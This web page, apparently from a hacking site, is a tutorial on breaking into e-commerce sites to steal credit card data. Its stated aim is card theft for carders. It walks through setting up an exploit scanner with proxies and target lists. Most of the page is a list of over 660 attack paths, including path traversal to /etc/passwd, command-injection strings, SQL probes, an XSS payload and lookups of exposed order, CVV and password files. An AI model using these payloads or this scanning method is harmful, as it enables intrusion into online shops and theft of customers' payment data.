About    Contact   

Informationleak
Not responsible for the downfall or death of society.
Hacking > Exploits
Hacking E-Commerce Sites

by Murder Mouse


Section 0: The Disclaimer

As covered on the main site all information presented within this guide is for information purposes only. Any attempt to use the information within this guide to commit anything illegal is solely the responsibility of the reader, and neither I, Information Leak, nor anyone else affiliated is responsible for what you do with the following information.

Section 1: The Introduction

Originally I was working on a security scanner for ecommerce sites, but since I'm about to get back into school and won't have as much time as before to really work on many projects I decided it'd be better to just go ahead and write a tutorial on the subject. So for this tutorial we will talk about one way a carder would collect CCs to cash/use/sell/whatever, and that of course is exploiting ecommerce sites. There are millions of sites out there used by businesses large and small for peddling their services/merchandise, and needless to say there are plenty of them out there that are easily exploited. So here it is, the answer to every "how to hack cc" question out there. Enjoy...

Section 2: Database Vulnerabilities

One of the most common and easiest ways to exploit ecommerce sites is to use database vulnerabilities. These are present due to insecure database software that many ecommerce sites will use for recording and tracking online purchases. One method that an attacker could use to find such database vulnerabilities on a specific site is to use an exploiter. Exploiters are software that will use an exploit list to scan for exploits on a target web server, and report back any positive responses. CMXploiter IV (http://xtremet.deny.de/downloads/cmxiv_setup.exe) is an example of an exploiter, though there are others that you can look for to use as well. The interface for CMXploiter IV is pretty self-explanatory, but I'll run you through the basics anyway. To use this tool you would first click "Load", which will bring up three different tabs. You would click "Exploit Lists" to select an exploit list to use, "Proxy List" is to of course select a list of proxies to use, and "URL List" is to select a list of targets to scan. Then from there you would go to Options. The first menu to pop up is the Current Session Options. Edit the responses to include in session history so that only the "200 Series responses" (positive responses) are included in the results, and from here you can also edit the "Socket Timeout value" based on your internet connection (leave as is for faster internet connections, set to 40 for slower internet connections). Then go to Proxy List Selection Options and either put in the proxy you are going to use for the scan, or click "Multi-Proxy Mode" to tell CMXploiter IV to use the proxy list you loaded. Now that you have everything configured go to Start and select the type of scan you want to do. "Single URL Scan" is used to scan a single server with the exploit list provided, "Multi-URL Scan" is used to scan every site in the url list for every exploit in the exploit list, and "Single Exploit Scan" is used to scan every site in the url list for a single exploit. On a last note with any exploiter you use if the option is available be sute to set it to use GET requests instead of HEAD requests for the scan. I've found that you get much more accurate results that way. Now that I've covered all the configurations I'm going to provide an exploit list that you could use for scanning database vulnerabilities...

  1.  

  2. /+comersus/database/comersus.mdb

  3. /+comersus/store/comersus.mdb

  4. /../../cart32.mdb

  5. //comersus.mdb

  6. //comersus/comersus.mdb

  7. //comersus/database/comersus.mdb

  8. //database/comersus.mdb

  9. //shop/

  10. //shop/?M=A

  11. //store/

  12. //store/?M=A

  13. //store/comersus.mdb

  14. //store/comersus/comersus.mdb

  15. //store/comersus/database/comersus.mdb

  16. //store/database/comersus.mdb

  17. /ASP/cart/

  18. /ASP/cart/database/

  19. /ASP/cart/database/metacart.mdb

  20. /Bin/cart.pl

  21. /Bin/cartmanager.cgi

  22. /Cgi-Bin/cart.pl

  23. /Cgi-Bin/cartmanager.cgi

  24. /Cgi/cartmanager.cgi

  25. /Cybercash/smps*.../merchants/admin.pw

  26. /DC/Auth_data/auth_user_file.txt

  27. /DC/Orders/orders.txt

  28. /DC/auth_data/auth_user_file.txt

  29. /DC/orders/orders.txt

  30. /DCShop/Auth_data/auth_user_file.txt

  31. /DCShop/Orders/orders.txt

  32. /DCShop/auth_data/auth_user_file.txt

  33. /DCShop/dcshop_admin.cgi

  34. /DCShop/orders/orders.txt

  35. /MIDICART/midicart.mdb

  36. /Merchant2/

  37. /Merchant2/INSTALL.txt

  38. /Merchant2/admin.mv

  39. /Merchant2/database/

  40. /Merchant2/modules/

  41. /ORDERS

  42. /ORDERS/

  43. /Orders/

  44. /Orders/order.log

  45. /Orders/order_log.dat

  46. /Orders/order_log_v12.dat

  47. /Orders/orders.txt

  48. /Oscommerce/catalog/

  49. /Oscommerce/catalog/admin/

  50. /Oscommerce/catalog/admin/orders.php

  51. /Osecommerce/

  52. /Osecommerce/admin/

  53. /Osecommerce/admin/admin/

  54. /Osecommerce/admin/admin/includes/

  55. /Osecommerce/admin/admin/includes/functions/

  56. /Osecommerce/admin/admin/includes/functions/database.php

  57. /PDG/cvv2.txt

  58. /PDG/order.txt

  59. /PDG_Cart

  60. /PDG_Cart/

  61. /PDG_Cart/authorizenet.txt

  62. /PDG_Cart/authorizenets.txt

  63. /PDG_Cart/cc.txt

  64. /PDG_Cart/oder.log

  65. /PDG_Cart/order.log

  66. /PDG_Cart/shopper.conf

  67. /PDG_Cart/shopper.config

  68. /PTSC/db/PTSC.mdb

  69. /ProcuctCart/pc/pcadmin/

  70. /ProdctCart/pcadmin/

  71. /ProductCart/database/EIPC.mdb

  72. /ProductCart/pc/admin

  73. /Sales_files/

  74. /Shop/Shop.sql

  75. /Shop/info.dat

  76. /Shop/orders.in

  77. /Shop/track.db

  78. /ShopCart2.mdb

  79. /ShoppingCart/cart.jsp

  80. /ShoppingCart/orders.inc

  81. /SiteServer/Admin/

  82. /SiteServer/Admin/commerce/foundation/DSN.asp

  83. /SiteServer/Admin/commerce/foundation/domain.asp

  84. /SiteServer/Admin/commerce/foundation/driver.asp

  85. /SiteServer/Admin/knowledge/dsmgr/default.asp

  86. /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp

  87. /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp

  88. /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp

  89. /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp

  90. /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp

  91. /SiteServer/Admin/knowledge/persmbr/vs.asp

  92. /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>

  93. /SiteServer/Publishing/

  94. /SiteServer/Publishing/ViewCode.asp

  95. /SiteServer/Publishing/viewcode.asp

  96. /SiteServer/admin/

  97. /SiteServer/admin/findvserver.asp

  98. /SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPassword_1

  99. /Store/admin/Default.asp

  100. /Store/orders.inc

  101. /StoreAdmin

  102. /StoreAdmin/

  103. /StoreDB

  104. /StoreDB/

  105. /WebShop

  106. /WebShop/

  107. /WebShop/logs/

  108. /WebShop/logs/cc.txt

  109. /WebShop/logs/ck.log

  110. /WebShop/templates/cc.txt

  111. /Web_Store

  112. /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html

  113. /Web_store

  114. /Web_store/

  115. /Web_store/Admin_files/

  116. /Web_store/web_store.cgi?page=../../../../../../../../etc/passw

  117. /Webshop*

  118. /Webshop/

  119. /Webshop/*

  120. /Webstore/

  121. /_database/shopping400.mdb

  122. /_private/shopping_cart.mdb

  123. /_vti_cnf/order.log

  124. /_vti_cnf/order.txt

  125. /acart.mdb

  126. /acart2.mdb

  127. /acart20.mdb

  128. /acart2_0.mdb

  129. /acart2_0/acart2_0.mdb

  130. /acart2_0/admin/category.asp /acart2_0/admin/error.asp?msg=

  131. /acart2_0/admin/index.asp?msg=

  132. /acart2_0/deliver.asp?msg=

  133. /acart2_0/error.asp?msg=

  134. /acart2_0/signin.asp?msg=

  135. /acartpath/signin.asp

  136. /admin/acart.mdb

  137. /admin/acart2.mdb

  138. /admin/acart20.mdb

  139. /admin/acart2_0.mdb

  140. /admin/apstore.mdb

  141. /admin/cart.cgi

  142. /admin/cgi-bin/.../card.csv

  143. /admin/cgi-bin/.../card.log

  144. /admin/cgi-bin/.../card.txt

  145. /admin/credit_card_info.php

  146. /admin/customers.csv

  147. /admin/customers.xls

  148. /admin/my_customer_base.asp

  149. /admin/order.dat

  150. /admin/orders.asp

  151. /admin/orders.dat

  152. /admin/orders.php

  153. /admin/orders/

  154. /admin/sales.csv

  155. /admin/sales.xls

  156. /admin/shop-dat.dat

  157. /admin/shop_login.htm

  158. /admin_files/order.log

  159. /allinurl/comersus/database/comersus.mdb

  160. /apstore.mdb

  161. /apstore/apstore.mdb

  162. /ashopKart20/admin.asp

  163. /ashopKart20/admin/scart.mdb

  164. /ashopKart20/scart.mdb

  165. /ashopkart20+-+ashoptkart20/admin

  166. /aspcart5.mdb

  167. /authorize.csv

  168. /authorize/dbmfiles/users

  169. /authorizenet.cgi

  170. /authorizenet.log

  171. /authorizenets.old

  172. /backoffice

  173. /backoffice+

  174. /backoffice+/

  175. /backoffice/

  176. /backoffice/customers.csv

  177. /backoffice/customers.xls

  178. /backoffice/index.asp

  179. /backoffice/login.jsp

  180. /backoffice/sales.csv

  181. /backoffice/sales.xls

  182. /backofficegold

  183. /backofficegold/

  184. /backofficegold/customers.csv

  185. /backofficegold/customers.xls

  186. /backofficegold/sales.csv

  187. /backofficegold/sales.xls

  188. /backofficelite

  189. /backofficelite/

  190. /backofficelite/customers.csv

  191. /backofficelite/customers.xls

  192. /backofficelite/default.asp

  193. /backofficelite/sales.csv

  194. /backofficelite/sales.xls

  195. /bill

  196. /billing

  197. /billing.nsf

  198. /billing/

  199. /billing/anyweb0001.htm

  200. /billing/billing.apw

  201. /billing/billing.swf

  202. /billpay/

  203. /bills

  204. /bin/DCShop/auth_data/auth_user_file.txt

  205. /bin/DCShop/orders/orders.txt

  206. /bin/cart.pl

  207. /bin/cartmanager.cgi

  208. /bin/netbilling/

  209. /bin/netbilling/.dbusers.db

  210. /bin/netbilling/.htaccess

  211. /bin/netbilling/.htpasswd

  212. /bin/netbilling/.htusers

  213. /bin/netbilling/.passwrd

  214. /bin/netbilling/WS_FTP.LOG

  215. /bin/netbilling/crontab.txt

  216. /bin/netbilling/expire.txt

  217. /bin/netbilling/htusers

  218. /bin/netbilling/robots.txt

  219. /bin/orders/orders.txt

  220. /bin/shop/auth_data/auth_user_file.txt

  221. /bin/shop/orders/orders.txt

  222. /bin/webcash/

  223. /bin/webcash/.dbusers.db

  224. /bin/webcash/.htaccess

  225. /bin/webcash/.htpasswd

  226. /bin/webcash/.htusers

  227. /bin/webcash/.passwrd

  228. /bin/webcash/WS_FTP.LOG

  229. /bin/webcash/crontab.txt

  230. /bin/webcash/expire.txt

  231. /bin/webcash/htusers

  232. /bin/webcash/robots.txt

  233. /bookstore/

  234. /bookstore/shop.mdb

  235. /bookstore/shopping.mdb

  236. /card.csv

  237. /card.log

  238. /card.txt

  239. /card/

  240. /cards/

  241. /cart

  242. /cart.cgi

  243. /cart.pl

  244. /cart/

  245. /cart/cart.cgi

  246. /cart/dealers/

  247. /cart/dealers/Copy of sql/

  248. /cart/dealers/Review-Correct.php

  249. /cart/dealers/Review-Corrects.php

  250. /cart/dealers/_notes/

  251. /cart/dealers/enter-order.php

  252. /cart/dealers/php.php

  253. /cart/dealers/review-orderAT.php

  254. /cart/dealers/table-test.htm

  255. /cart/dealers/untitled/

  256. /cart/dealers/yes-noas.php

  257. /cart/dealers/yes-noas2.php

  258. /cart/file-scripts/

  259. /cart/file-scripts/_notes/

  260. /cart/file-scripts/file-lesson-1.html

  261. /cart/file-scripts/file-lesson-2.html

  262. /cart/file-scripts/file-lesson-3.html

  263. /cart/file-scripts/file-perm.php

  264. /cart/file-scripts/is-readable.htm

  265. /cart/file-scripts/temp-file.htm

  266. /cart/file-scripts/test.txt

  267. /cart/file-scripts/write-to-a.php

  268. /cart32.exe

  269. /cart32.mdb

  270. /cartcart.cgi

  271. /cartman.php

  272. /cartman.php?action=add&id=../../../etc/passwd

  273. /cartman.php?action=add&id=1&descr=1=1&quantity=1

  274. /cartman.php?action=add&id=1001&descr=MS%20Office%202000&price=119&quantity=1

  275. /cartmanager.cgi

  276. /cash/

  277. /catalog/

  278. /catalog/admin/

  279. /catalog/admin/orders.php

  280. /cbi-bin/shop/

  281. /cc.csv

  282. /cc.log

  283. /cc.txt

  284. /ccard

  285. /ccard/

  286. /ccards/

  287. /ccv.csv

  288. /ccv.log

  289. /ccv.txt

  290. /cgi-bin-shop/

  291. /cgi-bin/.../authorize.csv

  292. /cgi-bin/.../authorize.cvs

  293. /cgi-bin/.../authorizenet.log

  294. /cgi-bin/.../authorizenets.old

  295. /cgi-bin/.../card.csv

  296. /cgi-bin/.../card.log

  297. /cgi-bin/.../card.txt

  298. /cgi-bin/.../cc.csv

  299. /cgi-bin/.../cc.log

  300. /cgi-bin/.../cc.txt

  301. /cgi-bin/.../ccv.csv

  302. /cgi-bin/.../ccv.log

  303. /cgi-bin/.../ccv.txt

  304. /cgi-bin/.../cvv.csv

  305. /cgi-bin/.../cvv.log

  306. /cgi-bin/.../cvv.txt

  307. /cgi-bin/.../cvv2.csv

  308. /cgi-bin/.../cvv2.log

  309. /cgi-bin/.../cvv2.txt

  310. /cgi-bin/.../order.csv

  311. /cgi-bin/.../order.log

  312. /cgi-bin/.../order.txt

  313. /cgi-bin/.../orders.txt

  314. /cgi-bin/.../shopper.conf

  315. /cgi-bin/DCShop/Auth_data/auth_user_file.txt

  316. /cgi-bin/DCShop/Orders/orders.txt

  317. /cgi-bin/DCShop/auth_data/auth_user_file.txt

  318. /cgi-bin/DCShop/dcprotect.pl

  319. /cgi-bin/DCShop/dcshop_admin.cgi

  320. /cgi-bin/DCShop/dcshop_admin.setup

  321. /cgi-bin/DCShop/orders/orders.txt

  322. /cgi-bin/DCShopAuth_data/auth_user_file.txt

  323. /cgi-bin/OrderForm.cgi

  324. /cgi-bin/Orders/orders.txt

  325. /cgi-bin/PDG

  326. /cgi-bin/PDG_Cart/mc.txt

  327. /cgi-bin/PDG_Cart/order.log

  328. /cgi-bin/PDG_cart/card.txt

  329. /cgi-bin/Web_Store/web_store.cgi

  330. /cgi-bin/Web_Store/web_store.cgi?page=%00

  331. /cgi-bin/Web_Store/web_store.cgi?page=../../../path/filename%00ext

  332. /cgi-bin/Web_store/web_store.cgi

  333. /cgi-bin/authorizenet.cgi/

  334. /cgi-bin/cart.pl

  335. /cgi-bin/cart.pl?db

  336. /cgi-bin/cart.pl?db='

  337. /cgi-bin/cart.pl?env

  338. /cgi-bin/cart.pl?path

  339. /cgi-bin/cart.pl?vars

  340. /cgi-bin/cart/

  341. /cgi-bin/cart/cart.pl?path

  342. /cgi-bin/cart/cart.pl?vars

  343. /cgi-bin/cart/pending.dat

  344. /cgi-bin/cart/vars.dat

  345. /cgi-bin/cart32.exe

  346. /cgi-bin/cart32.exe/error

  347. /cgi-bin/cart32.exe/expdate

  348. /cgi-bin/cart32.mdb

  349. /cgi-bin/cart32/

  350. /cgi-bin/cart32/tempfiles.list

  351. /cgi-bin/cartmanager.cgi

  352. /cgi-bin/comersus/store/database/comersus.mdb

  353. /cgi-bin/comersus/store/shopadmin1.asp

  354. /cgi-bin/commerce.cgi

  355. /cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html

  356. /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html

  357. /cgi-bin/commerce.cgi?page=../../../../etc/paswd%00index.html

  358. /cgi-bin/commerce.cgi?page=check

  359. /cgi-bin/conf/merchant_conf

  360. /cgi-bin/config/datasources/myorder.mdb

  361. /cgi-bin/cybercash-3.2/conf/merchant_conf

  362. /cgi-bin/cybercash/

  363. /cgi-bin/cybercash/conf/merchant_conf

  364. /cgi-bin/dcshop.cgi

  365. /cgi-bin/dcshop/Auth_data/auth_user_file.txt

  366. /cgi-bin/dcshop/Orders/orders.txt

  367. /cgi-bin/dcshop/auth_data/auth_user_file.txt

  368. /cgi-bin/dcshop/orders/orders.txt

  369. /cgi-bin/e-cart

  370. /cgi-bin/e-cart/cart.txt

  371. /cgi-bin/ecommerce/

  372. /cgi-bin/ecommerce/passwords

  373. /cgi-bin/eshop.pl/seite=;cat%20eshop.pl|

  374. /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd|

  375. /cgi-bin/eshop.pl?seite=;ls|

  376. /cgi-bin/eurodebit/data/.htpasswd

  377. /cgi-bin/ezmall2000/mall2000.cgi

  378. /cgi-bin/ezmall2000/mall2000.cgi?page=../../../../../../../bin/comando%20/diretorio/00.html%7c

  379. /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|

  380. /cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt

  381. /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1

  382. /cgi-bin/ezshopper2/loadpage.cgi

  383. /cgi-bin/ezshopper2/loadpage.cgi?+//

  384. /cgi-bin/ezshopper2/loadpage.cgi?id+/

  385. /cgi-bin/ezshopper2/loadpage.cgi?id+/subdiretorio/

  386. /cgi-bin/ezshopper3/loadpage.cgi

  387. /cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=/

  388. /cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=//

  389. /cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

  390. /cgi-bin/i-shop/

  391. /cgi-bin/i-shop/admin/store.log

  392. /cgi-bin/i-shop/admin/store_user_lib.pl

  393. /cgi-bin/i-shopEire/admin/store.log

  394. /cgi-bin/i-shopSale/admin/store.log

  395. /cgi-bin/i-shoppro/

  396. /cgi-bin/i-shoppro/admin/store.log

  397. /cgi-bin/ibill

  398. /cgi-bin/ibill/

  399. /cgi-bin/ibill/.htpasswd

  400. /cgi-bin/ibill/mypasswd/.memberfile

  401. /cgi-bin/ibillpm.pl

  402. /cgi-bin/ibll

  403. /cgi-bin/ibll.log

  404. /cgi-bin/mall2000.cgi

  405. /cgi-bin/msbill

  406. /cgi-bin/msbill.log

  407. /cgi-bin/msbilllog.txt

  408. /cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?

  409. /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w

  410. /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?

  411. /cgi-bin/netbilling

  412. /cgi-bin/netbilling/

  413. /cgi-bin/netbilling/.dbusers.db

  414. /cgi-bin/netbilling/.htaccess

  415. /cgi-bin/netbilling/.htpasswd

  416. /cgi-bin/netbilling/.htusers

  417. /cgi-bin/netbilling/.passwrd

  418. /cgi-bin/netbilling/WS_FTP.LOG

  419. /cgi-bin/netbilling/crontab.txt

  420. /cgi-bin/netbilling/expire.txt

  421. /cgi-bin/netbilling/htusers

  422. /cgi-bin/netbilling/robots.txt

  423. /cgi-bin/order

  424. /cgi-bin/order.cgi

  425. /cgi-bin/order.dat

  426. /cgi-bin/order.db

  427. /cgi-bin/order.log

  428. /cgi-bin/order.mdb

  429. /cgi-bin/order.txt

  430. /cgi-bin/order1.log

  431. /cgi-bin/orderinfo.txt

  432. /cgi-bin/orderlog.txt

  433. /cgi-bin/orders.dat

  434. /cgi-bin/orders.log

  435. /cgi-bin/orders.mdb

  436. /cgi-bin/orders.txt

  437. /cgi-bin/orders/

  438. /cgi-bin/orders/*.olf

  439. /cgi-bin/orders/1001.1.log

  440. /cgi-bin/orders/cc.txt

  441. /cgi-bin/orders/mc.txt

  442. /cgi-bin/orders/orders

  443. /cgi-bin/orders/orders.txt

  444. /cgi-bin/orders/orders/

  445. /cgi-bin/orders/track.db

  446. /cgi-bin/payment.mart

  447. /cgi-bin/paypal.cgi

  448. /cgi-bin/paypal/

  449. /cgi-bin/paypal/command

  450. /cgi-bin/paypal/test.txt

  451. /cgi-bin/paypal/test2.txt

  452. /cgi-bin/paypal/test3.txt

  453. /cgi-bin/paypal/test4.txt

  454. /cgi-bin/pdg_cart/order.csv

  455. /cgi-bin/perlshop.cgi

  456. /cgi-bin/quikstore.cgi

  457. /cgi-bin/quikstore.cgi?page=../../../../../../../etc/passwd%00.html&cart_id=

  458. /cgi-bin/quikstore.cgi?page=../orders/%00html&cart_id=

  459. /cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=

  460. /cgi-bin/quikstore.cgi?page=orders/%00html&cart_id=

  461. /cgi-bin/quikstore.cgi?store='

  462. /cgi-bin/scripts/cart.pl

  463. /cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items

  464. /cgi-bin/scripts/cart.pl?env

  465. /cgi-bin/scripts/cart.pl?vars

  466. /cgi-bin/secure/orders

  467. /cgi-bin/secure/orders/

  468. /cgi-bin/shop-dat.dat

  469. /cgi-bin/shop.cgi

  470. /cgi-bin/shop.cgi/page=../../../../etc/hosts

  471. /cgi-bin/shop.cgi/page=../../../../etc/passwd

  472. /cgi-bin/shop.log

  473. /cgi-bin/shop.pl

  474. /cgi-bin/shop.pl/page=../../../../etc/passwd

  475. /cgi-bin/shop.pl?page=xxx

  476. /cgi-bin/shop/Auth_data/auth_user_file.txt

  477. /cgi-bin/shop/Orders/orders.txt

  478. /cgi-bin/shop/auth_data/auth_user_file.txt

  479. /cgi-bin/shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|

  480. /cgi-bin/shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1

  481. /cgi-bin/shop/info.dat

  482. /cgi-bin/shop/orders/orders.txt

  483. /cgi-bin/shop/pgp_encrypt/cc_store_lib.pm

  484. /cgi-bin/shop/pgp_encrypt/order_admin.cgi

  485. /cgi-bin/shop/pgp_encrypt/pgp_lib.pm

  486. /cgi-bin/shop/pgp_encrypt/print_invoice.cgi

  487. /cgi-bin/shop/pgp_encrypt/process.cgi

  488. /cgi-bin/shop/pgp_encrypt/store_admin.cgi

  489. /cgi-bin/shop/pgp_encrypt/store_params.cgi

  490. /cgi-bin/shop/pgp_encrypt/validate_card.pm

  491. /cgi-bin/shop/shop/

  492. /cgi-bin/shop/smart.cfg

  493. /cgi-bin/shop/track.db

  494. /cgi-bin/shopadmin.asp

  495. /cgi-bin/shopper

  496. /cgi-bin/shopper.cgi

  497. /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG

  498. /cgi-bin/shopper.cgi/&TEMPLATE=ORDER.LOG

  499. /cgi-bin/shopper.cgi?

  500. /cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts

  501. /cgi-bin/shopper.cgi?newpage=../../../etc/passwd

  502. /cgi-bin/shopper.cgi?search=action&keywords=HACK&template=order.log

  503. /cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template=order.log

  504. /cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template=order1.log

  505. /cgi-bin/shopper.exe

  506. /cgi-bin/shopper.exe?display=action&template=order.log

  507. /cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log

  508. /cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log

  509. /cgi-bin/shopper.exe?search=action&keywords=TryThis&templateds=order.log

  510. /cgi-bin/shopper.exe?search=action&keywords=musksx&template=order.log

  511. /cgi-bin/shopper/cheddar/loadpage.cgi

  512. /cgi-bin/shopping.mdb

  513. /cgi-bin/shoppper.exe/.../card.log

  514. /cgi-bin/shoppper.exe/.../card.txt

  515. /cgi-bin/shoppper.exe/.../order.csv

  516. /cgi-bin/shoppper.exe/.../order.log

  517. /cgi-bin/shoppper.exe/.../order.txt

  518. /cgi-bin/shoppper.exe/PDG_cart/order.log

  519. /cgi-bin/shopsearch.asp

  520. /cgi-bin/store.cgi

  521. /cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00

  522. /cgi-bin/store.cgi?StartID=../etc/hosts%00.html

  523. /cgi-bin/store.cgi?StartID=../etc/passwd%00.html

  524. /cgi-bin/store/Admin_files/

  525. /cgi-bin/store/Admin_files/orders.txt

  526. /cgi-bin/store/admin_files/order.log

  527. /cgi-bin/store/agora.cgi?page=hoschi.html

  528. /cgi-bin/store/dcshop_admin.cgi

  529. /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd

  530. /cgi-bin/store/pgp_encrypt/cc_store_lib.pm

  531. /cgi-bin/store/pgp_encrypt/order_admin.cgi

  532. /cgi-bin/store/pgp_encrypt/pgp_lib.pm

  533. /cgi-bin/store/pgp_encrypt/print_invoice.cgi

  534. /cgi-bin/store/pgp_encrypt/process.cgi

  535. /cgi-bin/store/pgp_encrypt/store_admin.cgi

  536. /cgi-bin/store/pgp_encrypt/store_params.cgi

  537. /cgi-bin/store/pgp_encrypt/validate_card.pm

  538. /cgi-bin/ustorekeeper.pl

  539. /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

  540. /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls|

  541. /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

  542. /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls

  543. /cgi-bin/webcart/

  544. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD

  545. /cgi-bin/webcash

  546. /cgi-bin/webcash/

  547. /cgi-bin/webcash/.dbusers.db

  548. /cgi-bin/webcash/.htaccess

  549. /cgi-bin/webcash/.htpasswd

  550. /cgi-bin/webcash/.htusers

  551. /cgi-bin/webcash/.passwrd

  552. /cgi-bin/webcash/WS_FTP.LOG

  553. /cgi-bin/webcash/crontab.txt

  554. /cgi-bin/webcash/expire.txt

  555. /cgi-bin/webcash/htusers

  556. /cgi-bin/webcash/robots.txt

  557. /cgi-bin2/authorize

  558. /cgi-bin2/ibll

  559. /cgi-bin2/ibll.log

  560. /cgi-bin2/msbill

  561. /cgi-bin2/msbill.log

  562. /cgi-bin2/netbilling

  563. /cgi-bin2/newoordir

  564. /cgi-bin2/webcash

  565. /cgi-local/DCShop/auth_data/auth_user_file.txt

  566. /cgi-local/DCShop/orders/orders.txt

  567. /cgi-local/PDG_Cart/shopper.conf

  568. /cgi-local/Web_Store/web_store.cgi

  569. /cgi-local/cart.pl

  570. /cgi-local/cybercash-3.2/conf/merchant_conf

  571. /cgi-local/orders/

  572. /cgi-local/orders/orders.txt

  573. /cgi-local/shop.cfg

  574. /cgi-local/shop.cgi

  575. /cgi-local/shop.cgi/page=../../../../etc/passwd

  576. /cgi-local/shop.pl

  577. /cgi-local/shop.pl/SID=947626980.19094/page=;ls|

  578. /cgi-local/shop.pl/page=%s

  579. /cgi-local/shop.pl/page=../../../../etc/passwd

  580. /cgi-local/shop.pl/page=;id|

  581. /cgi-local/shop.pl/page=;ls|

  582. /cgi-local/shop/

  583. /cgi-local/shop/auth_data/auth_user_file.txt

  584. /cgi-local/shop/orders/orders.txt

  585. /cgi-local/shop/secure

  586. /cgi-local/shop/secure/

  587. /cgi-shop/

  588. /cgi-shop/?open

  589. /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc%00

  590. /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999

  591. /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/passwd%00

  592. /cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00

  593. /cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999

  594. /cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=0000-0000

  595. /cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=0000-0001

  596. /cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=1900-0999

  597. /cgi-shop?open

  598. /cgi-temp/Web_Store/web_store.cgi

  599. /cgi-win/Web_Store/web_store.cgi

  600. /cgi-win/netbilling/

  601. /cgi-win/netbilling/.dbusers.db

  602. /cgi-win/netbilling/.freshteen

  603. /cgi-win/netbilling/.htaccess

  604. /cgi-win/netbilling/.htpasswd

  605. /cgi-win/netbilling/.htusers

  606. /cgi-win/netbilling/.passwrd

  607. /cgi-win/netbilling/WS_FTP.LOG

  608. /cgi-win/netbilling/crontab.txt

  609. /cgi-win/netbilling/expire.txt

  610. /cgi-win/netbilling/htusers

  611. /cgi-win/netbilling/robots.txt

  612. /cgi-win/shop/auth_data/auth_user_file.txt

  613. /cgi-win/shop/orders/orders.txt

  614. /cgi-win/webcash/

  615. /cgi-win/webcash/.dbusers.db

  616. /cgi-win/webcash/.freshteen

  617. /cgi-win/webcash/.htaccess

  618. /cgi-win/webcash/.htpasswd

  619. /cgi-win/webcash/.htusers

  620. /cgi-win/webcash/.passwrd

  621. /cgi-win/webcash/WS_FTP.LOG

  622. /cgi-win/webcash/crontab.txt

  623. /cgi-win/webcash/expire.txt

  624. /cgi-win/webcash/htusers

  625. /cgi-win/webcash/robots.txt

  626. /cgi/DCShop/auth_data/auth_user_file.txt

  627. /cgi/DCShop/orders/orders.txt

  628. /cgi/PDG_Cart/order.log.%207,%200.94,%20/cgi-bin/PDG_cart/card.txt

  629. /cgi/Web_Store/web_store.cgi

  630. /cgi/cart.pl

  631. /cgi/cartmanager.cgi

  632. /cgi/commerce.cgi

  633. /cgi/commerce.cgi?page=../../../../etc/hosts%00index.html

  634. /cgi/i-shop/admin/store.log

  635. /cgi/i-shoppro/admin/store.log

  636. /cgi/ibill/

  637. /cgi/netbilling/

  638. /cgi/netbilling/.dbusers.db

  639. /cgi/netbilling/.htaccess

  640. /cgi/netbilling/.htpasswd

  641. /cgi/netbilling/.htusers

  642. /cgi/netbilling/.passwrd

  643. /cgi/netbilling/WS_FTP.LOG

  644. /cgi/netbilling/crontab.txt

  645. /cgi/netbilling/expire.txt

  646. /cgi/netbilling/htusers

  647. /cgi/netbilling/robots.txt

  648. /cgi/order.cgi

  649. /cgi/orders/orders.txt

  650. /cgi/webcash/

  651. /cgi/webcash/.dbusers.db

  652. /cgi/webcash/.htaccess

  653. /cgi/webcash/.htpasswd

  654. /cgi/webcash/.htusers

  655. /cgi/webcash/.passwrd

  656. /cgi/webcash/WS_FTP.LOG

  657. /cgi/webcash/crontab.txt

  658. /cgi/webcash/expire.txt

  659. /cgi/webcash/htusers

  660. /cgi/webcash/robots.txt

  661. /cgi_bin/DCShop/Auth_data/auth_user_file.txt

  662. /cgi_bin/DCShop/Orders/orders.txt

